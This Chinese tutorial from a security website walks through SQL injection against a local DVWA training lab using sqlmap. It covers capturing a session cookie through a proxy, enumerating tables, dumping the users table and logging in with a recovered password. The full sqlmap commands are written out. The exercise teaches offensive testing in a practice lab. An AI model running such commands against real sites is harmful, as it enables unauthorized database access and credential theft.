频道栏目
首页 > 安全 > 网站安全 > 正文

sqlmap注入

2017-07-17 11:12:53      个评论      
收藏   我要投稿

用phpstudy 链接 dvwa 搭建一个环境

而后呢,我们要使用抓包软件抓一下dvwa的cookie

让我们先来看一下演示:

首先进入dvwa 将难度设置为low(为了演示方便)

\

接着呢 要使用用抓包 抓出dvwa登录时的cookie

首先配置代理,在这里呢 我设置代理端口为默认:8080 如下图所示

\
\

打开抓取按钮 刷新页面

可以看到

Cookies为 security=low; PHPSESSID=m04sk2chd2m6k381lcqrjukja4

所以 我们使用cookie 进行爆破测试

打开 sqlmap 让我来一起进行试验

我们有cookie 所以使用cookie方式注入

首先使用命令:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4"

\
\

我们可以看到 已经注入成功

接着我们爆出表--->

爆出 dvwa下的表名命令:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4" -D dvwa --tables

\

我们可以看到 dvwa下有 两个表单 一个为guestbook 一个为 users

很明显 users下有我们想要的东西

所以 我们就爆出users下面的字段

使用命令:

C:\Python27\sqlmap>sqlmap.p-u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4" -D dvwa --tables --dump -T Users

\

喏,这时,我们可以明显看到 users表单中 所爆出来的 账号密码一共有5组,这样 我们随便拿个账号试验一下看能否登录进去

这个长得顺眼 咱们就用这个:

账号为:pablo 密码为:letmein

\
\

Ok,成功登入进去

上一篇:利用Office模版注入攻击关键基础设施
下一篇:大型网站系统架构的演化
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训

版权所有: 红黑联盟--致力于做实用的IT技术学习网站